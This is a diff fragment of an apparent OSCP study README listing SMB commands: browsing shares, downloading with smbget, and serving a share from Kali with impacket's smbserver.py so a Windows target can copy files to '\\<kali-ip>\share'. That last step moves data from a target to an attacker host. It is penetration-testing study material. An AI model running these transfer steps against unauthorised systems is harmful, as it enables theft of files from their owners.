ville87/offsec/OSCP/README.md

 - `shares` --> list shares
 - `use <share>` --> use share xyz
 - `get <file>` --> download file
+Or with smbget:
+- `smbget -R smb://1.1.1.1/folder`

 Transfer files from the Kali VM with smbserver.py:
 - `python /usr/lib/python2.7/dist-packages/impacket/smbserver.py share /root/Desktop/OSCP/SMB/SMBServer/`
 - on the Windows target, get the connection to the share with e.g.: `net use \\<kali-ip>\share`
 - copy the file from the remote target to the kali: `copy file.txt \\<kali-ip>\share\